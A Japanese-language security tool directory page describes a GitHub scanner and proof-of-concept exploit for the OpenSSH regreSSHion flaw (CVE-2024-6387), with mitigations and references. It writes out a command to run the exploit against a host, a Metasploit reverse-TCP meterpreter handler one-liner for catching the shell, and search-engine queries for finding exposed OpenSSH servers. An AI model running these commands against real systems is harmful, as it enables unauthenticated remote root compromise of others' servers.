Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-6387 — OpenSSHサーバーにおけるリモートからの未認証コード実行の脆弱性 (CVE-2024-6387) | Kitploit
ツール/GitHubGitHub/karmakstylez/cve-2024-6387
偵察脆弱性スキャナーエクスプロイトネットワークセキュリティペネトレーションテストリモートアクセスツール
GitHubkarmakstylez/cve-2024-6387

CVE-2024-6387

OpenSSHサーバーにおけるリモートからの未認証コード実行の脆弱性 (CVE-2024-6387)

リポジトリを見る
1884742年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

openssh CVE-2024-6387.py - PoC

重要な注意事項!!!

このエクスプロイトは32ビットのOpenSSHサーバーでのみ動作します。これは、PoCが32ビットポインターを使用するためです。 また、一部のバージョンは既にパッチが適用されており、すべてのサーバーが脆弱であるとは限らないことが知られています。 テスト済み: Kali Linux, ParrotSec, Ubuntu 22.04

📜 説明

OpenSSHサーバーにおけるリモート認証不要のコード実行脆弱性

CVE-2024-6387.pyは、最近発見されたregreSSHion脆弱性(CVE-2024-6387)を特に標的とし、脆弱なバージョンのOpenSSHを実行しているサーバーを特定するために設計された、軽量で効率的なツールです。このスクリプトは、複数のIPアドレス、ドメイン名、CIDRネットワーク範囲を迅速にスキャンして潜在的な脆弱性を検出し、インフラストラクチャの安全性を確保します。

OpenSSHのサーバー(sshd)においてシグナルハンドラの競合状態が見つかりました。クライアントがLoginGraceTime秒(デフォルト120秒、古いOpenSSHバージョンでは600秒)以内に認証を行わない場合、sshdのSIGALRMハンドラが非同期に呼び出されます。しかし、このシグナルハンドラはsyslog()など、非同期シグナルセーフではないさまざまな関数を呼び出します。

📁 目次

  • 📖 詳細
  • 🌟 特徴
  • ⚙️ 使用方法
  • O 出力
  • 🔍 ホスト発見
  • 🛠️ 緩和策
  • 💁 参考文献
  • 📌 作者
  • 📢 免責事項

✍🏻 詳細

技術的な詳細はこちらをご覧ください。

この欠陥は、2024年5月にQualysの研究者によって発見され、識別子CVE-2024-6387が割り当てられました。sshdのシグナルハンドラ競合状態が原因で、認証されていないリモート攻撃者がrootとして任意のコードを実行できる可能性があります。

「クライアントがLoginGraceTime秒(デフォルト120秒)以内に認証を行わない場合、sshdのSIGALRMハンドラが非同期に呼び出され、非同期シグナルセーフではないさまざまな関数を呼び出します」と述べられています。

「リモートの認証されていない攻撃者は、この欠陥を利用してroot権限で任意のコードを実行できます。」

🌟 特徴

  • 高速スキャン: 複数のIPアドレス、ドメイン名、CIDR範囲をCVE-2024-6387脆弱性に対して迅速にスキャンします。
  • バナー取得: 認証なしでSSHバナーを効率的に取得します。
  • 猶予時間検出: オプションで、LoginGraceTime設定を使用してサーバーが脆弱性を緩和しているかどうかを検出します。
  • IPv6対応: 直接およびホスト名ベースのスキャンの両方でIPv6アドレスを完全にサポートします。
  • マルチスレッド: スレッドを使用して同時チェックを行い、スキャン時間を大幅に短縮します。
  • 詳細な出力: スキャン結果を要約した明確で絵文字コード化された出力を提供します。
  • ポートチェック: クローズされたポートを識別し、応答しないホストのサマリーを提供します。
  • パッチ適用済みバージョンの検出: 既知のパッチ適用済みバージョンを認識し、脆弱性レポートから除外します。

⚙️ 使用方法

OpenSSHサーバーのスキャン

必要条件: python3 最新

root@kitploit:~
### コマンドライン引数
mode: 操作モードを選択します。選択肢はscanまたはexploitです。
-T, --targets: IPアドレス、ドメイン名、IPアドレスを含むファイルパス、またはCIDRネットワーク範囲。
-f, --outputfile: 結果を保存するファイル(例: result.json)。
-g, --gracetimecheck: バージョン特定後、LoginGraceTimeの緩和をチェックするまでの待機時間(秒)(デフォルト: 120秒)。
-n, --nic: ネットワークNIC(デフォルト: 'eth0')。
-o, --output: 結果の出力形式(選択肢: 'csv', 'txt', 'json')。
-p, --port: チェックまたはエクスプロイトするポート番号(デフォルト: 22)。
-s, --speed: 競合状態の可能性を高めるスレッド数(デフォルト: 10)。
-t, --timeout: 接続タイムアウト(秒)(デフォルト: 1秒)。
-H, --resolve-hostnames: ホスト名を解決する

例

単一のURL/IPのスキャン

root@kitploit:~
python3 CVE-2024-6387.py scan -T example.com -p 22

1つのドメイン/IPに対するエクスプロイトの実行

root@kitploit:~
python3 CVE-2024-6387.py exploit -T example.com -p 22 -n eth0

権限昇格プロセス

ペイロードのキャッチ

最初に以下のコマンドを実行し({yourip}ハンドラを変更)、その後上記のコマンドでエクスプロイトを実行するだけです。

root@kitploit:~
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"

出力

ツールは読みやすさを向上させるために、コンソールに色分けされた出力を提供します:

  • 緑: 接続または操作の成功。
  • 赤: 接続失敗またはエラー。
  • 黄: 警告または注意すべき情報。
  • シアン: 一般的な情報またはステータスの更新。

🔍 ホスト発見

  • Hunter: /product.name="OpenSSH"
  • FOFA: app="OpenSSH"
  • SHODAN: product:"OpenSSH"
  • CENSYS: (openssh) and labels=remote-access

🛠️ 緩和策

  • パッチ管理: OpenSSHの利用可能なパッチを迅速に適用することは、脆弱性のギャップを埋めるために重要です。タイムリーなパッチ適用により、既知のエクスプロイトがシステムに対して利用されるのを防ぎ、攻撃者の機会の窓を減らします。

  • アクセス制御の強化: ネットワークベースの制御を通じてSSHアクセスを制限することは、追加の防御層を提供します。このアプローチは、SSH接続を許可されたネットワークまたはIPアドレスのみに制限することで、潜在的な攻撃者への露出を最小限に抑えます。ファイアウォールルールの実装や安全なアクセスのためのVPNの使用などのツールは、これらの制限を効果的に強制できます。

  • ネットワークセグメンテーション: ネットワークをセグメントに分割することは、潜在的な侵害の影響を封じ込めるのに役立ちます。重要なシステムと機密データをネットワークの重要でない部分から分離することで、攻撃者による横方向の移動のリスクを減らします。このセグメンテーションは、厳格なアクセス制御と監視を組み合わせて、これらのセグメントへの不正な試みを検出し対応することができます。

  • 侵入検知システム(IDS): IDSまたは侵入防止システム(IPS)を展開することで、ネットワークトラフィックとシステムログのリアルタイム監視が可能になります。これらのシステムは、regreSSHion脆弱性に関連する不審な活動や潜在的なエクスプロイトの試みを検出できます。これらのシステムによってトリガーされたアラートは、重大な損害が発生する前に迅速な調査と緩和を可能にします。

  • エクスプロイト試行の監視: ネットワークとシステムログの継続的な監視が重要です。OpenSSH脆弱性を悪用しようとする試みを示す可能性のある異常なパターンや活動を探します。この積極的なアプローチは、脅威が害を及ぼす前に特定し対応するのに役立ちます。

💁 参考文献

  • 原作者: CVE-2024-6387 Scanner
  • 原作者: CVE-2024-6387 PoC

その他の参考文献

  • http://www.openwall.com/lists/oss-security/2024/07/01/12
  • https://access.redhat.com/security/cve/CVE-2024-6387
  • https://bugzilla.redhat.com/show_bug.cgi?id=2294604
  • https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt
  • https://github.com/zgzhang/cve-2024-6387-poc
  • https://ubuntu.com/security/CVE-2024-6387
  • https://ubuntu.com/security/notices/USN-6859-1
  • https://www.suse.com/security/cve/CVE-2024-6387.html
  • https://explore.alas.aws.amazon.com/CVE-2024-6387.html
  • https://archlinux.org/news/the-sshd-service-needs-to-be-restarted-after-upgrading-to-openssh-98p1/
  • https://www.openssh.com/txt/release-9.8
  • https://lists.mindrot.org/pipermail/openssh-unix-announce/2024-July/000158.html
  • https://lists.mindrot.org/pipermail/openssh-unix-dev/2024-July/041431.html
  • https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server
  • https://www.theregister.com/2024/07/01/regresshion_openssh/
  • https://news.ycombinator.com/item?id=40843778

📢 免責事項

  • 重要な注意:
    • このツールは、許可された侵入テストおよびレッドチーム演習の目的のみで開発および使用されます。glibcベースのLinuxシステム上のOpenSSHサーバーの脆弱性を特定し、悪用するために設計されています。このツールの不正使用は固く禁止されています。このツールの所有者は、ツールの不正アクセスや悪意のある使用について一切責任を負いません。
  • 法的通知:
    • それぞれの所有者からの明示的な許可なしに、システムやネットワーク上でこのツールを不正に使用することは、適用される法律や規制に違反する可能性があります。ユーザーは、サイバーセキュリティテストおよび評価を管理する法的および倫理的基準への準拠を確保する責任があります。
ツールをダウンロード
  • https://security-tracker.debian.org/tracker/CVE-2024-6387
  • https://github.com/oracle/oracle-linux/issues/149
  • https://github.com/rapier1/hpn-ssh/issues/87
  • https://stackdiary.com/openssh-race-condition-in-sshd-allows-remote-code-execution/
  • https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0010
  • http://www.openwall.com/lists/oss-security/2024/07/01/13
  • https://security.netapp.com/advisory/ntap-20240701-0001/